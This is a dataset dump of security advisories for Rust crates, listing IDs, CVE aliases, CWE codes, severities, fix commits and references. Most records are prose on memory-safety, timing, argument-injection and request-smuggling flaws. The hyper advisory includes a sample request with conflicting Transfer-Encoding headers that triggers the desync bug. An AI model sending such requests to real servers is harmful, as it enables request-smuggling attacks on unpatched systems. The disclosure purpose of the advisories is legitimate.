ecosystem
stringclasses
11 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
220
details
stringlengths
34
13.5k
aliases
stringlengths
17
87
modified_date
stringdate
2019-03-26 14:13:00
2022-05-10 08:46:52
published_date
stringdate
2012-06-17 03:41:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
581 values
refs
stringlengths
82
11.6k
introduced
stringclasses
843 values
code_refs
stringlengths
46
940
commits
stringlengths
46
940
crates.io
GHSA-7cqg-8449-rmfv
Observable Discrepancy in libsecp256k1-rs
A timing vulnerability in the Scalar::check_overflow function in Parity libsecp256k1-rs before 0.3.1 potentially allows an attacker to leak information via a side-channel attack.
{'CVE-2019-20399'}
2021-07-27T15:21:02Z
2021-08-25T21:01:27Z
MODERATE
null
{'CWE-203', 'CWE-362'}
{'https://github.com/paritytech/libsecp256k1/commit/11ba23a9766a5079918cd9f515bc100bc8164b50', 'https://nvd.nist.gov/vuln/detail/CVE-2019-20399'}
null
{'https://github.com/paritytech/libsecp256k1/commit/11ba23a9766a5079918cd9f515bc100bc8164b50'}
{'https://github.com/paritytech/libsecp256k1/commit/11ba23a9766a5079918cd9f515bc100bc8164b50'}
crates.io
RUSTSEC-2021-0062
project abandoned; migrate to the `aes-siv` crate
The Miscreant project has been abandoned and archived. The Rust implementation has been adapted into the new `aes-siv` crate which implements both the AES-CMAC-SIV and AES-PMAC-SIV constructions: <https://github.com/RustCrypto/AEADs/tree/master/aes-siv> Please migrate to the `aes-siv` crate. Alternatively see the `aes-gcm-siv` crate for a newer, faster construction which provides similar properties: <https://github.com/RustCrypto/AEADs/tree/master/aes-gcm-siv>
null
2021-05-03T19:05:09Z
2021-02-28T12:00:00Z
null
null
null
{'https://crates.io/crates/miscreant', 'https://rustsec.org/advisories/RUSTSEC-2021-0062.html', 'https://github.com/miscreant/miscreant.rs/commit/5d921f579e0c2b9960d472cf377b8487d97fbcec'}
null
{'https://github.com/miscreant/miscreant.rs/commit/5d921f579e0c2b9960d472cf377b8487d97fbcec'}
{'https://github.com/miscreant/miscreant.rs/commit/5d921f579e0c2b9960d472cf377b8487d97fbcec'}
crates.io
GHSA-773q-5334-5gf9
Memory over-allocation in evm-core
Prior to the patch, when executing specific EVM opcodes related to memory operations that use `evm_core::Memory::copy_large`, the crate can over-allocate memory when it is not needed, making it possible for an attacker to perform denial-of-service attack. The flaw was corrected in commit `19ade85`.
null
2021-08-18T21:38:27Z
2021-08-25T20:55:36Z
MODERATE
null
{'CWE-789'}
{'https://rustsec.org/advisories/RUSTSEC-2021-0066.html', 'https://github.com/rust-blockchain/evm/commit/19ade85', 'https://github.com/rust-blockchain/evm'}
null
{'https://github.com/rust-blockchain/evm/commit/19ade85'}
{'https://github.com/rust-blockchain/evm/commit/19ade85'}
crates.io
GHSA-wrvc-72w7-xpmj
Incorrect Comparison in sodiumoxide
An issue was discovered in the sodiumoxide crate before 0.2.5 for Rust. generichash::Digest::eq compares itself to itself and thus has degenerate security properties.
{'CVE-2019-25002'}
2021-08-19T21:20:40Z
2021-08-25T20:45:54Z
CRITICAL
null
{'CWE-697'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-25002', 'https://github.com/sodiumoxide/sodiumoxide', 'https://github.com/sodiumoxide/sodiumoxide/pull/381', 'https://rustsec.org/advisories/RUSTSEC-2019-0026.html', 'https://github.com/sodiumoxide/sodiumoxide/pull/381/commits/fae052b834b097ced9a89a8fff8466e18f383070'}
null
{'https://github.com/sodiumoxide/sodiumoxide/pull/381/commits/fae052b834b097ced9a89a8fff8466e18f383070'}
{'https://github.com/sodiumoxide/sodiumoxide/pull/381/commits/fae052b834b097ced9a89a8fff8466e18f383070'}
crates.io
GHSA-8mjx-h23h-w2pg
Double free in stack_dst
An issue was discovered in the stack_dst crate before 0.6.1 for Rust. Because of the push_inner behavior, a double free can occur upon a val.clone() panic.
{'CVE-2021-28034'}
2021-08-30T21:56:32Z
2021-09-01T18:30:44Z
CRITICAL
null
{'CWE-415'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-28034', 'https://rustsec.org/advisories/RUSTSEC-2021-0033.html', 'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d53809e3000f40085f2b229b6b1a33759881d', 'https://github.com/thepowersgang/stack_dst-rs'}
null
{'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d53809e3000f40085f2b229b6b1a33759881d'}
{'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d53809e3000f40085f2b229b6b1a33759881d'}
crates.io
GHSA-q879-9g95-56mx
Wrong type for `Linker`-define functions when used across two `Engine`s
### Impact As a Rust library the `wasmtime` crate clearly marks which functions are safe and which are `unsafe`, guaranteeing that if consumers never use `unsafe` then it should not be possible to have memory unsafety issues in their embeddings of Wasmtime. An issue was discovered in the safe API of `Linker::func_*` APIs. These APIs were previously not sound when one `Engine` was used to create the `Linker` and then a different `Engine` was used to create a `Store` and then the `Linker` was used to instantiate a module into that `Store`. Cross-`Engine` usage of functions is not supported in Wasmtime and this can result in type confusion of function pointers, resulting in being able to safely call a function with the wrong type. Triggering this bug requires using at least two `Engine` values in an embedding and then additionally using two different values with a `Linker` (one at the creation time of the `Linker` and another when instantiating a module with the `Linker`). It's expected that usage of more-than-one `Engine` in an embedding is relatively rare since an `Engine` is intended to be a globally shared resource, so the expectation is that the impact of this issue is relatively small. The fix implemented is to change this behavior to `panic!()` in Rust instead of silently allowing it. Using different `Engine` instances with a `Linker` is a programmer bug that `wasmtime` catches at runtime. ### Patches This bug has been patched and users should upgrade to Wasmtime version 0.30.0. ### Workarounds If you cannot upgrade Wasmtime and are using more than one `Engine` in your embedding it's recommended to instead use only one `Engine` for the entire program if possible. An `Engine` is designed to be a globally shared resource that is suitable to have only one for the lifetime of an entire process. If using multiple `Engine`s is required then code should be audited to ensure that `Linker` is only used with one `Engine`. ### For more information If you have any questions or comments about this advisory: * Reach out to us on [the Bytecode Alliance Zulip chat](https://bytecodealliance.zulipchat.com/#narrow/stream/217126-wasmtime) * Open an issue in [the `bytecodealliance/wasmtime` repository](https://github.com/bytecodealliance/wasmtime/)
{'CVE-2021-39219'}
2021-09-17T20:07:13Z
2021-09-20T19:54:26Z
MODERATE
null
{'CWE-843'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-39219', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAVBRYDDUIY2ZR3K3FO4BVYJKIMJ5TP7/', 'https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-q879-9g95-56mx', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z2Z33FTXFQ6EOINVEQIP4DFBG53G5XIY/', 'https://github.com/bytecodealliance/wasmtime', 'https://github.com/bytecodealliance/wasmtime/commit/b39f087414f27ae40c44449ed5d1154e03449bff', 'https://crates.io/crates/wasmtime'}
null
{'https://github.com/bytecodealliance/wasmtime/commit/b39f087414f27ae40c44449ed5d1154e03449bff'}
{'https://github.com/bytecodealliance/wasmtime/commit/b39f087414f27ae40c44449ed5d1154e03449bff'}
crates.io
GHSA-m9m5-cg5h-r582
Improper random number generation in nanorand
An issue was discovered in the nanorand crate before 0.5.1 for Rust. It caused any random number generator (even ChaCha) to return all zeroes because integer truncation was mishandled.
{'CVE-2020-35926'}
2021-08-19T18:55:41Z
2021-08-25T20:50:24Z
CRITICAL
null
{'CWE-338'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-35926', 'https://github.com/Absolucy/nanorand-rs', 'https://twitter.com/aspenluxxxy/status/1336684692284772352', 'https://rustsec.org/advisories/RUSTSEC-2020-0089.html', 'https://github.com/Absolucy/nanorand-rs/commit/5ba218ac29df4786b002d7d12b47fa0c04a331f2'}
null
{'https://github.com/Absolucy/nanorand-rs/commit/5ba218ac29df4786b002d7d12b47fa0c04a331f2'}
{'https://github.com/Absolucy/nanorand-rs/commit/5ba218ac29df4786b002d7d12b47fa0c04a331f2'}
crates.io
RUSTSEC-2019-0038
Fix for UB in failure to catch panics crossing FFI boundaries
Affected versions of this crate failed to catch panics crossing FFI boundaries via callbacks, which is a form of UB. This flaw was corrected by [this commit][1] which was included in version 2.6.0. [1]: https://github.com/jnqnfe/pulse-binding-rust/commit/7fd282aef7787577c385aed88cb25d004b85f494
null
2020-10-25T19:19:23Z
2019-03-10T12:00:00Z
null
null
null
{'https://rustsec.org/advisories/RUSTSEC-2019-0038.html', 'https://crates.io/crates/libpulse-binding', 'https://github.com/jnqnfe/pulse-binding-rust/commit/7fd282aef7787577c385aed88cb25d004b85f494'}
null
{'https://github.com/jnqnfe/pulse-binding-rust/commit/7fd282aef7787577c385aed88cb25d004b85f494'}
{'https://github.com/jnqnfe/pulse-binding-rust/commit/7fd282aef7787577c385aed88cb25d004b85f494'}
crates.io
GHSA-5xg3-j2j6-rcx4
Relative Path Traversal in git-delta
git-delta before 0.8.3 on Windows resolves an executable's pathname as a relative path from the current directory.
{'CVE-2021-36376'}
2021-09-09T16:46:42Z
2021-08-25T21:01:39Z
HIGH
null
{'CWE-427', 'CWE-23'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-36376', 'https://vuln.ryotak.me/advisories/54', 'https://github.com/dandavison/delta', 'https://github.com/dandavison/delta/commit/f01846bd443aaf92fdd5ac20f461beac3f6ee3fd', 'https://github.com/dandavison/delta/releases/tag/0.8.3'}
null
{'https://github.com/dandavison/delta/commit/f01846bd443aaf92fdd5ac20f461beac3f6ee3fd'}
{'https://github.com/dandavison/delta/commit/f01846bd443aaf92fdd5ac20f461beac3f6ee3fd'}
crates.io
RUSTSEC-2020-0069
Argument injection in sendmail transport
Affected versions of lettre allowed argument injection to the sendmail command. It was possible, using forged `to` addresses, to pass arbitrary arguments to the sendmail executable. Depending on the implementation (original sendmail, postfix, exim, etc.) it could be possible in some cases to write email data into arbitrary files (using sendmail's logging features). The flaw is corrected by modifying the executed command to stop parsing arguments before passing the destination addresses. NOTE: This vulnerability only affects the `sendmail` transport. Others, including `smtp`, are not affected. This vulnerability was reported by vin01.
{'CVE-2020-28247'}
2021-10-19T22:14:35Z
2020-11-11T12:00:00Z
null
null
null
{'https://crates.io/crates/lettre', 'https://github.com/lettre/lettre/pull/508/commits/bbe7cc5381c5380b54fb8bbb4f77a3725917ff0b', 'https://rustsec.org/advisories/RUSTSEC-2020-0069.html'}
null
{'https://github.com/lettre/lettre/pull/508/commits/bbe7cc5381c5380b54fb8bbb4f77a3725917ff0b'}
{'https://github.com/lettre/lettre/pull/508/commits/bbe7cc5381c5380b54fb8bbb4f77a3725917ff0b'}
crates.io
RUSTSEC-2018-0004
Malicious input could cause uninitialized memory to be exposed
Affected versions of Claxon made an invalid assumption about the decode buffer size being a multiple of a value read from the bitstream. This could cause parts of the decode buffer to not be overwritten. If the decode buffer was newly allocated and uninitialized, this uninitialized memory could be exposed. This allows an attacker to observe parts of the uninitialized memory in the decoded audio stream. The flaw was corrected by checking that the value read from the bitstream divides the decode buffer size, and returning a format error if it does not. If an error is returned, the decode buffer is not exposed. Regression tests and an additional fuzzer have been added to prevent similar flaws in the future.
{'CVE-2018-20992'}
2021-10-19T22:14:35Z
2018-08-25T12:00:00Z
null
null
null
{'https://github.com/ruuda/claxon/commit/8f28ec275e412dd3af4f3cda460605512faf332c', 'https://crates.io/crates/claxon', 'https://rustsec.org/advisories/RUSTSEC-2018-0004.html'}
null
{'https://github.com/ruuda/claxon/commit/8f28ec275e412dd3af4f3cda460605512faf332c'}
{'https://github.com/ruuda/claxon/commit/8f28ec275e412dd3af4f3cda460605512faf332c'}
crates.io
GHSA-28ph-f7gx-fqj8
Data races in rusqlite
An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via create_module.
{'CVE-2020-35867'}
2021-08-19T21:08:12Z
2021-08-25T20:47:57Z
CRITICAL
null
{'CWE-362'}
{'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0', 'https://github.com/rusqlite/rusqlite', 'https://github.com/rusqlite/rusqlite/commit/3c6b57fe1b2cc87e7ebecde43dd836ffb1c4ea5c', 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35867'}
null
{'https://github.com/rusqlite/rusqlite/commit/3c6b57fe1b2cc87e7ebecde43dd836ffb1c4ea5c'}
{'https://github.com/rusqlite/rusqlite/commit/3c6b57fe1b2cc87e7ebecde43dd836ffb1c4ea5c'}
crates.io
GHSA-w3g5-2848-2v8r
Data races in generator
The `Generator` type is an iterable which uses a generator function that yields values. In affected versions of the crate, the provided function yielding values had no `Send` bounds despite the `Generator` itself implementing `Send`. The generator function lacking a `Send` bound means that types that are dangerous to send across threads such as `Rc` could be sent as part of a generator, potentially leading to data races. This flaw was fixed in commit [`f7d120a3b`](https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0) by enforcing that the generator function be bound by `Send`.
{'CVE-2020-36471'}
2021-08-24T18:04:25Z
2021-08-25T20:57:05Z
MODERATE
null
{'CWE-362'}
{'https://github.com/Xudong-Huang/generator-rs/issues/27', 'https://github.com/Xudong-Huang/generator-rs', 'https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0', 'https://rustsec.org/advisories/RUSTSEC-2020-0151.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36471'}
null
{'https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0'}
{'https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0'}
crates.io
GHSA-hrjm-c879-pp86
Side-channel timing attack in libsecp256k1
An issue was discovered in the libsecp256k1 crate before 0.3.1 for Rust. Scalar::check_overflow allows a timing side-channel attack; consequently, attackers can obtain sensitive information.
{'CVE-2019-25003'}
2021-08-19T21:19:40Z
2021-08-25T20:46:46Z
HIGH
null
{'CWE-208'}
{'https://github.com/paritytech/libsecp256k1/commit/11ba23a9766a5079918cd9f515bc100bc8164b50', 'https://github.com/paritytech/libsecp256k1', 'https://nvd.nist.gov/vuln/detail/CVE-2019-25003', 'https://rustsec.org/advisories/RUSTSEC-2019-0027.html'}
null
{'https://github.com/paritytech/libsecp256k1/commit/11ba23a9766a5079918cd9f515bc100bc8164b50'}
{'https://github.com/paritytech/libsecp256k1/commit/11ba23a9766a5079918cd9f515bc100bc8164b50'}
crates.io
GHSA-rjh8-p66p-jrh5
Data races in rusqlite
An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via an Auxdata API data race.
{'CVE-2020-35871'}
2021-08-19T21:18:47Z
2021-08-25T20:46:59Z
HIGH
null
{'CWE-362'}
{'https://github.com/rusqlite/rusqlite/commit/2ef3628dac35aeba0a97d5fb3a57746b4e1d62b3', 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0', 'https://github.com/rusqlite/rusqlite', 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35871'}
null
{'https://github.com/rusqlite/rusqlite/commit/2ef3628dac35aeba0a97d5fb3a57746b4e1d62b3'}
{'https://github.com/rusqlite/rusqlite/commit/2ef3628dac35aeba0a97d5fb3a57746b4e1d62b3'}
crates.io
GHSA-wcxc-jf6c-8rx9
Uncaught Exception in libpulse-binding
Affected versions of this crate failed to catch panics crossing FFI boundaries via callbacks, which is a form of UB. This flaw was corrected by [this commit][1] which was included in version 2.6.0.
null
2021-08-18T20:24:24Z
2021-08-25T20:57:21Z
MODERATE
null
{'CWE-248'}
{'https://rustsec.org/advisories/RUSTSEC-2019-0038.html', 'https://github.com/jnqnfe/pulse-binding-rust/commit/7fd282aef7787577c385aed88cb25d004b85f494', 'https://github.com/jnqnfe/pulse-binding-rust'}
null
{'https://github.com/jnqnfe/pulse-binding-rust/commit/7fd282aef7787577c385aed88cb25d004b85f494'}
{'https://github.com/jnqnfe/pulse-binding-rust/commit/7fd282aef7787577c385aed88cb25d004b85f494'}
crates.io
GHSA-8928-2fgm-6x9x
HTTP Request Smuggling in actix-http
Affected versions of this crate did not properly detect invalid requests that could allow HTTP/1 request smuggling (HRS) attacks when running alongside a vulnerable front-end proxy server. This can result in leaked internal and/or user data, including credentials, when the front-end proxy is also vulnerable. Popular front-end proxies and load balancers already mitigate HRS attacks so it is recommended that they are also kept up to date; check your specific set up. You should upgrade even if the front-end proxy receives exclusively HTTP/2 traffic and connects to the back-end using HTTP/1; several downgrade attacks are known that can also expose HRS vulnerabilities.
{'CVE-2021-38512'}
2021-08-18T20:13:40Z
2021-08-25T20:58:21Z
HIGH
null
{'CWE-444'}
{'https://github.com/actix/actix-web', 'https://rustsec.org/advisories/RUSTSEC-2021-0081.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/67URRW4K47SR6LNQB4YALPLGGQMQK7HO/', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/actix-http/RUSTSEC-2021-0081.md', 'https://github.com/actix/actix-web/pull/2363', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38512', 'https://github.com/actix/actix-web/commit/e965d8298f421e9c89fe98b1300b8361e948c324'}
null
{'https://github.com/actix/actix-web/commit/e965d8298f421e9c89fe98b1300b8361e948c324'}
{'https://github.com/actix/actix-web/commit/e965d8298f421e9c89fe98b1300b8361e948c324'}
crates.io
GHSA-hw4v-5x4h-c3xm
Transaction validity oversight in pallet-ethereum
### Impact A bug in `pallet-ethereum` can cause invalid transactions to be included in the Ethereum block state in `pallet-ethereum` due to not validating the input data size. Any invalid transactions included this way have no possibility to alter the internal Ethereum or Substrate state. The transaction will appear to have be included, but is of no effect as it is rejected by the EVM engine. The impact is further limited by Substrate extrinsic size constraints. ### Patches Patches are applied in PR #465. ### Workarounds None. ### References Patch PR: https://github.com/paritytech/frontier/pull/465 ### For more information If you have any questions or comments about this advisory: * Open an issue in the [Frontier repo](https://github.com/paritytech/frontier)
{'CVE-2021-39193'}
2021-09-03T20:22:28Z
2021-09-01T18:22:48Z
MODERATE
null
{'CWE-20'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-39193', 'https://github.com/paritytech/frontier/pull/465', 'https://github.com/paritytech/frontier/security/advisories/GHSA-hw4v-5x4h-c3xm', 'https://github.com/paritytech/frontier/commit/dd112e', 'https://github.com/paritytech/frontier/commit/0b962f218f0cdd796dadfe26c3f09e68f7861b26', 'https://github.com/paritytech/frontier', 'https://github.com/paritytech/frontier/pull/465/commits/8a2b890a2fb477d5fedd0e4335b00623832849ae'}
null
{'https://github.com/paritytech/frontier/pull/465/commits/8a2b890a2fb477d5fedd0e4335b00623832849ae', 'https://github.com/paritytech/frontier/commit/0b962f218f0cdd796dadfe26c3f09e68f7861b26', 'https://github.com/paritytech/frontier/commit/dd112e'}
{'https://github.com/paritytech/frontier/commit/dd112e', 'https://github.com/paritytech/frontier/pull/465/commits/8a2b890a2fb477d5fedd0e4335b00623832849ae', 'https://github.com/paritytech/frontier/commit/0b962f218f0cdd796dadfe26c3f09e68f7861b26'}
crates.io
GHSA-gwc9-348x-qwv2
Use after free in Wasmtime
There is a use after free vulnerability in Wasmtime when both running Wasm that uses `externref`s and enabling [epoch interruption](https://docs.rs/wasmtime/latest/wasmtime/struct.Config.html#method.epoch_interruption) in Wasmtime. If you are not explicitly enabling epoch interruption (it is disabled by default) then you are not affected. If you are explicitly disabling the Wasm reference types proposal (it is enabled by default) then you are also not affected. The use after free is caused by Cranelift failing to emit stack maps when there are safepoints inside cold blocks. Cold blocks occur when epoch interruption is enabled. Cold blocks are emitted at the end of compiled functions, and change the order blocks are emitted versus defined. This reordering accidentally caused Cranelift to skip emitting some stack maps because it expected to emit the stack maps in block definition order, rather than block emission order. When Wasmtime would eventually collect garbage, it would fail to find live references on the stack because of the missing stack maps, think that they were unreferenced garbage, and therefore reclaim them. Then after the collection ended, the Wasm code could use the reclaimed-too-early references, which is a use after free. This bug was discovered while extending our fuzz targets for `externref`s and GC in Wasmtime. The updated fuzz target thoroughly exercises these code paths and feature combinations now. We have also added a regression test for this bug. Released versions 0.34.2 and 0.35.2, which fix the vulnerability. We recommend all Wasmtime users upgrade to these patched versions. If upgrading is not an option for you at this time, you can avoid the vulnerability by either disabling the Wasm reference types proposal or by disabling epoch interruption if you were previously enabling it.
{'CVE-2022-24791'}
2022-04-12T23:16:15Z
2022-04-01T13:36:12Z
HIGH
null
{'CWE-416'}
{'https://github.com/WebAssembly/reference-types', 'https://github.com/bytecodealliance/wasmtime/commit/666c2554ea0e1728c35aa41178cf235920db888a', 'https://github.com/bytecodealliance/wasmtime', 'https://docs.rs/wasmtime/latest/wasmtime/struct.Config.html#method.epoch_interruption', 'https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-gwc9-348x-qwv2', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24791'}
null
{'https://github.com/bytecodealliance/wasmtime/commit/666c2554ea0e1728c35aa41178cf235920db888a'}
{'https://github.com/bytecodealliance/wasmtime/commit/666c2554ea0e1728c35aa41178cf235920db888a'}
crates.io
GHSA-45w7-7g63-2m5w
Drop of uninitialized memory in stack_dst
Affected versions of stack_dst used a push_inner function that increased the internal length of the array and then called val.clone(). If the val.clone() call panics, the stack could drop an already dropped element or drop uninitialized memory. This issue was fixed in 2a4d538 by increasing the length of the array after elements are cloned.
{'CVE-2021-28035'}
2021-08-30T21:56:02Z
2021-09-01T18:30:55Z
CRITICAL
null
{'CWE-908'}
{'https://github.com/thepowersgang/stack_dst-rs/issues/5', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28035', 'https://github.com/thepowersgang/stack_dst-rs', 'https://rustsec.org/advisories/RUSTSEC-2021-0033.html', 'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d538'}
null
{'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d538'}
{'https://github.com/thepowersgang/stack_dst-rs/commit/2a4d538'}
crates.io
GHSA-8c6g-4xc5-w96c
Uninitialized memory exposure in claxon
An issue was discovered in the claxon crate before 0.4.1 for Rust. Uninitialized memory can be exposed because certain decode buffer sizes are mishandled.
{'CVE-2018-20992'}
2021-08-19T21:24:16Z
2021-08-25T20:43:52Z
MODERATE
null
{'CWE-908'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-20992', 'https://github.com/ruuda/claxon/commit/8f28ec275e412dd3af4f3cda460605512faf332c', 'https://github.com/ruuda/claxon', 'https://rustsec.org/advisories/RUSTSEC-2018-0004.html'}
null
{'https://github.com/ruuda/claxon/commit/8f28ec275e412dd3af4f3cda460605512faf332c'}
{'https://github.com/ruuda/claxon/commit/8f28ec275e412dd3af4f3cda460605512faf332c'}
crates.io
RUSTSEC-2020-0162
`tokio-proto` is deprecated/unmaintained
The [`tokio-proto`](https://crates.io/crates/tokio-proto) crate has been deprecated, and [its GitHub repository](https://github.com/tokio-rs/tokio-proto) has been archived. Users may be interested in [`tokio-tower`](https://crates.io/crates/tokio-tower) instead, per https://github.com/tokio-rs/tokio/issues/118#issuecomment-452969665
null
2022-02-07T02:25:36Z
2020-02-06T12:00:00Z
null
null
null
{'https://rustsec.org/advisories/RUSTSEC-2020-0162.html', 'https://github.com/tokio-rs/tokio-proto/commit/56c720ea3c74efa8f39e36c24e609628222b16a1', 'https://crates.io/crates/tokio-proto'}
null
{'https://github.com/tokio-rs/tokio-proto/commit/56c720ea3c74efa8f39e36c24e609628222b16a1'}
{'https://github.com/tokio-rs/tokio-proto/commit/56c720ea3c74efa8f39e36c24e609628222b16a1'}
crates.io
GHSA-jjx5-3f36-6927
Incorrect buffer size calculation in iced-x86
An issue was discovered in the iced-x86 crate through 1.10.3 for Rust. In Decoder::new(), slice.get_unchecked(slice.length()) is used unsafely.
{'CVE-2021-38188'}
2021-08-18T21:31:51Z
2021-08-25T20:55:47Z
CRITICAL
null
{'CWE-131'}
{'https://rustsec.org/advisories/RUSTSEC-2021-0068.html', 'https://github.com/icedland/iced/issues/168', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38188', 'https://github.com/icedland/iced', 'https://github.com/icedland/iced/commit/3c607a003e03b773108401d109167d1840487dce'}
null
{'https://github.com/icedland/iced/commit/3c607a003e03b773108401d109167d1840487dce'}
{'https://github.com/icedland/iced/commit/3c607a003e03b773108401d109167d1840487dce'}
crates.io
GHSA-8r7q-r9mx-35rh
Mishandling of format strings in rusqlite
An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated because rusqlite::trace::log mishandles format strings.
{'CVE-2020-35869'}
2021-08-19T21:18:40Z
2021-08-25T20:47:18Z
CRITICAL
null
{'CWE-134'}
{'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0', 'https://github.com/rusqlite/rusqlite/commit/2327d3b774927fdf48903c0bdc1ca7ec93c7c8d0', 'https://github.com/rusqlite/rusqlite', 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35869'}
null
{'https://github.com/rusqlite/rusqlite/commit/2327d3b774927fdf48903c0bdc1ca7ec93c7c8d0'}
{'https://github.com/rusqlite/rusqlite/commit/2327d3b774927fdf48903c0bdc1ca7ec93c7c8d0'}
crates.io
GHSA-6hfq-h8hq-87mf
HTTP Request Smuggling in hyper
### Summary hyper's HTTP server code had a flaw that incorrectly understands some requests with multiple transfer-encoding headers to have a chunked payload, when it should have been rejected as illegal. This combined with an upstream HTTP proxy that understands the request payload boundary differently can result in "request smuggling" or "desync attacks". ### Vulnerability The flaw was introduced in https://github.com/hyperium/hyper/commit/26417fc24a7d05df538e0f39239b373c5c3d61f6, released in v0.12.0. Consider this example request: ``` POST /yolo HTTP/1.1 Transfer-Encoding: chunked Transfer-Encoding: cow ``` This request *should* be rejected, according to RFC 7230, since it has a `Transfer-Encoding` header, but after folding, it does not end in `chunked`. hyper would notice the `chunked` in the first line, and then check the second line, and thanks to a missing boolean assignment, *not* set the error condition. hyper would treat the payload as being `chunked`. By differing from the spec, it is possible to send requests like these to endpoints that have different HTTP implementations, with different interpretations of the payload semantics, and cause "desync attacks". There are several parts of the spec that must also be checked, and hyper correctly handles all of those. Additionally, hyper's *client* does not allow sending requests with improper headers, so the misunderstanding cannot be propagated further. Read more about desync attacks: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn ### Impact To determine if vulnerable, all these things must be true: - **Using hyper as an HTTP *server*.** The client is not affected. - **Using HTTP/1.1.** HTTP/2 does not use `transfer-encoding`. - **Using a vulnerable HTTP proxy upstream to hyper.** If an upstream proxy correctly rejects the illegal transfer-encoding headers, the desync attack cannot succeed. If there is *no* proxy upstream of hyper, hyper cannot *start* the desync attack, as the client will repair the headers before forwarding. ### Patches We have released and backported the following patch versions: - v0.14.3 - v0.13.10 ### Workarounds Besides upgrading hyper, you can take the following options: - Reject requests that contain a `transfer-encoding` header. - Ensure any upstream proxy handles `transfer-encoding` correctly. ### Credits This issue was initially reported by ZeddYu Lu From Qi An Xin Technology Research Institute.
{'CVE-2021-21299'}
2021-08-18T21:07:17Z
2021-08-25T20:56:18Z
MODERATE
null
{'CWE-444'}
{'https://github.com/hyperium/hyper', 'https://rustsec.org/advisories/RUSTSEC-2021-0020.html', 'https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn', 'https://github.com/hyperium/hyper/commit/8f93123efef5c1361086688fe4f34c83c89cec02', 'https://github.com/hyperium/hyper/security/advisories/GHSA-6hfq-h8hq-87mf', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21299'}
null
{'https://github.com/hyperium/hyper/commit/8f93123efef5c1361086688fe4f34c83c89cec02'}
{'https://github.com/hyperium/hyper/commit/8f93123efef5c1361086688fe4f34c83c89cec02'}
crates.io
GHSA-6vmq-jh76-hq43
Uninitialized memory access in outer_cgi
An issue was discovered in the outer_cgi crate before 0.2.1 for Rust. A user-provided Read instance receives an uninitialized memory buffer from KeyValueReader.
{'CVE-2021-30454'}
2021-08-19T17:03:35Z
2021-08-25T20:55:25Z
CRITICAL
null
{'CWE-119'}
{'https://rustsec.org/advisories/RUSTSEC-2021-0051.html', 'https://github.com/SolraBizna/outer_cgi/commit/dd59b3066e616a08e756f72de8dc3ab11b7036c4', 'https://nvd.nist.gov/vuln/detail/CVE-2021-30454', 'https://github.com/SolraBizna/outer_cgi/issues/1', 'https://github.com/SolraBizna/outer_cgi'}
null
{'https://github.com/SolraBizna/outer_cgi/commit/dd59b3066e616a08e756f72de8dc3ab11b7036c4'}
{'https://github.com/SolraBizna/outer_cgi/commit/dd59b3066e616a08e756f72de8dc3ab11b7036c4'}
crates.io
GHSA-wgx2-6432-j3fw
Unsoundness in bigint
An issue was discovered in the bigint crate through 2020-05-07 for Rust. It allows a soundness violation.
{'CVE-2020-35880'}
2021-08-19T21:07:53Z
2021-08-25T20:48:04Z
CRITICAL
null
{'CWE-704'}
{'https://github.com/rustsec/advisory-db/pull/290', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35880', 'https://github.com/paritytech/bigint', 'https://github.com/paritytech/bigint/commit/7e71521a61b009afc94c91135353102658550d42', 'https://rustsec.org/advisories/RUSTSEC-2020-0025.html'}
null
{'https://github.com/paritytech/bigint/commit/7e71521a61b009afc94c91135353102658550d42'}
{'https://github.com/paritytech/bigint/commit/7e71521a61b009afc94c91135353102658550d42'}
crates.io
GHSA-x67x-vg9m-65c3
Integer overflow in base64
